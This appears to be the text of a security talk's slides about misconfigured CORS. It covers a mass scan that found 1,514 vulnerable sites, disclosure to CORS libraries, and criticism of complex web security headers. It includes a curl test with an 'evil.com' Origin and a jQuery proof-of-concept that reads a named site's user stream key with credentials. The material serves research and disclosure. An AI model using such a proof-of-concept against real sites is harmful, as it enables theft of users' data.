Misconfigured CORS
Evan Johnson
Why being secure isn’t getting easier
About MeMy name is EvanI’m a software engineer.I’m work on security at CloudflareI love golang.
How would you secure the internet?
The internet is not a series of castles
The internet is not a series of castles
Same-Origin Policy
Cross Origin Resource Sharing
CORS is driven by the Origin headerBased on origin header, the server is supposed to make
decisions about what CORS header to display
Access-Control-Allow-Origin: *Is not the same as reflecting the origin header. * means
no cookies
Cross Origin Resource Sharing Appropriately
Cross Origin Resource Sharing Appropriately
Reflecting all Origin headersAs Access-Control-Allow-Origin WITH Access-Control-
Allow-Credentials: trueWould be really bad.
Does anyone do this?
Why?
It basically turns off Same-Origin policy…
Which is like ... one of the worst security problems to have.
Cross Origin Resource Sharing Problem
Testing for Bad CORS
Testing for bad cors ➜ ~ curl https://streamable.com -H "Origin: https://evil.com" -I
HTTP/1.1 200 OKDate: Tue, 27 Sep 2016 03:39:01 GMTContent-Type: text/html; charset=utf-8Content-Length: 34969Connection: keep-aliveServer: nginxVary: Accept-EncodingSet-Cookie: session=D2V05A0PVBFAXGCW7NJFGCPF; Domain=.streamable.com; Expires=Sat, 13-Feb-2044 03:39:01 GMT; Path=/Access-Control-Allow-Origin: https://evil.comAccess-Control-Allow-Credentials: true
Exploit Proof of Concept$.ajax({
url:"https://streamable.com/ajax/me", success: function( data ) {
document.write("Your stream key is " + data['stream_key']); }, xhrFields: { withCredentials: true }});
How widespread is this problem?
How do I know?
I scanned the Alexa 1M for websites that:●Access-Control-Allow-Origin: <myevilsite.com>●Access-Control-Allow-Credentials: true●I followed redirects●I checked both http and https
1,514 sites with this problem config
The code - https://github.com/ejcx/badcors-massscan
●Written in go●Heavy use of concurrency patterns●Making it public after this talk, and making the results and all the
sites public.
The code -
The code -
What do you do when you find a thousand vulnerable websites?
Started tracking these misconfigurations at their src
●I started looking for the libraries that people were using to cause this behavior.
●I reported this to ○SAILS JS○Rack CORS○(some go library rs/cors.go or something)○More to come.
CORS, the source
CORS, the source
So…. What’s this about?
Complexity
Complexity in CORS
Cross origin resource sharing could be way easier.
● The authors clearly wanted to prevent people from this type of behavior.
●That’s why “*” and “Allow-Credentials: true” is not allowed.
●Why make it possible at all.
●Why do you need 6 different response headers
●Reminds me of OpenSSL
CORS is not alone...
●CSP●SRI●HPKP●Credential management●HSTS
Content Security Policy
●A new “hot” http response header●CSP is still a mess. Has 3 headers.●It is growing in complexity BY THE GOSH DARN DAY
Content Security Policy
Sub-Resource Integrity
●Load only expected assets. SRI dictates that you can only load things sub resources that match a hash that is baked in to the DOM.
●This is nice, but SRI is confusing. Who should use SRI. When is it no tnecessary? The spec is not clear.
HTTP Public Key Pinning
●There are probably a bakers dozen of websites where this is useful
●Securityheaders.io tries to make you want to turn on HPKP●Huge operational burden●Disaster. ●Complex.
HPKP
Credential Management
●In your browser NOW! Be afraid●Allows websites to log you in using the browser password
manager
HTTP Strict Transport Security
●Very normal header to set now’a’days.●It is not easy. Beware of “includeSubdomains●https://twitter.com/bcrypt/status/781969754806366208
What about usable security?
Who remembers OpenSSL?anyone? anyone?
Why not go the way of TLS1.3
It should be easy to make a castle,so where do we go from here?
Demand simplicity
●Web specifications are hard. Why are they not easy?●Cross Origin Resource Sharing needs a full rewrite.●There are three different Content Security Policy headers....●Some browsers still don’t support it.●Some browsers still don’t support SRI.
WHAT A MESS! Web Specs should be easy!
Come help us save the webThis stuff is all too hard.